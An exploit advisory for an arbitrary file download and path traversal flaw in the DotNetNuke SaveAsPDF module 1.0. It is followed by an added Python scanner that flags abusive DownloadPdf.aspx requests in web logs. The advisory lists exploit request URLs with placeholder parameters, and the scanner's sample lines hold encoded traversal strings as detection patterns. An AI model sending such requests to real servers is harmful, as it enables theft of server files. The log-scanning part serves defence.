KingSkrupellos

DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download

Mar 11th, 2019
####################################################################

# Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/03/2019
# Vendor Homepage : bizmodules.net ~ dnnsoftware.com
# Software Information Links :
bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx
bizmodules.net/portals/0/downloads/sap.pdf
# Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke
websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including
text, pictures and even Flash content.

####################################################################

# Impact :
***********
* DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download
arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the
web server process and obtain potentially sensitive information. The issue can also be
used as an open redirection vulnerability.

* An information exposure is the intentional or unintentional disclosure of information to an actor
that is not explicitly authorized to have access to that information.

* The software uses external input to construct a pathname that should be within a
restricted directory, but it does not properly neutralize sequences such as ".." that
can resolve to a location that is outside of that directory.

####################################################################

# Arbitrary File Download Exploit :
*******************************
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov

/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]

/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]

Note : It can download any random website as a PDF file to your computer, and
it downloads system files from DNNSoftware.

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
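
For defenders reviewing web logs, the following Python is an added example (not part of the original advisory or the module's code) that flags requests to DownloadPdf.aspx whose url/Url/file parameter points off-site or carries traversal or local-path syntax. The combined access-log format, the OWN_HOSTS value and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/desktopmodules/saveaspdf/downloadpdf.aspx"  # path from the advisory
TARGET_PARAMS = {"url", "file"}  # parameter names from the advisory, lower-cased
OWN_HOSTS = {"www.example.org"}  # assumption: hostnames the DNN site itself serves
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
LOCAL_PATH = re.compile(r"(^|[\\/])\.\.([\\/]|$)|^[A-Za-z]:[\\/]|^file:", re.I)

def classify(request_uri, own_hosts=OWN_HOSTS):
    """Return the reasons a DownloadPdf.aspx request looks abusive ([] if none)."""
    parts = urlsplit(request_uri)
    if parts.path.lower() != ENDPOINT:
        return []
    reasons = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() not in TARGET_PARAMS:
            continue
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; again for %252e%252e
            target = urlsplit(value)
            scheme, host = target.scheme.lower(), (target.hostname or "").lower()
            if LOCAL_PATH.search(value):
                reasons.append(f"{name}: traversal or local path")
            if scheme in ("http", "https") and host not in own_hosts:
                reasons.append(f"{name}: external host {host}")
    return reasons

def scan(log_lines):  # returns (client, uri, reasons) for each flagged line
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        try:
            reasons = classify(m.group(2)) if m else []
        except ValueError:  # urlsplit rejects malformed hosts such as "http://["
            reasons = ["unparseable URL"]
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits

# Constructed sample traffic: documentation addresses and hostnames, not real logs.
FMT = ('{} - - [12/Mar/2019:10:00:01 +0000] '
       '"GET /DesktopModules/SaveAsPDF/DownloadPdf.aspx?{} HTTP/1.1" 200 512')
SAMPLE = [FMT.format(ip, query) for ip, query in (
    ("198.51.100.7", "Name=12&Url=https://www.example.org/Default.aspx?tabid=188"),
    ("203.0.113.5", "url=https://other.example.net/"),
    ("203.0.113.5", "Name=7&file=..%2F..%2Fexample.txt"),
    ("203.0.113.9", "Name=7&Url=%252e%252e%255cexample.txt"),
)]
```

On IIS W3C logs, join the cs-uri-stem and cs-uri-query fields with "?" and pass the result to classify() directly.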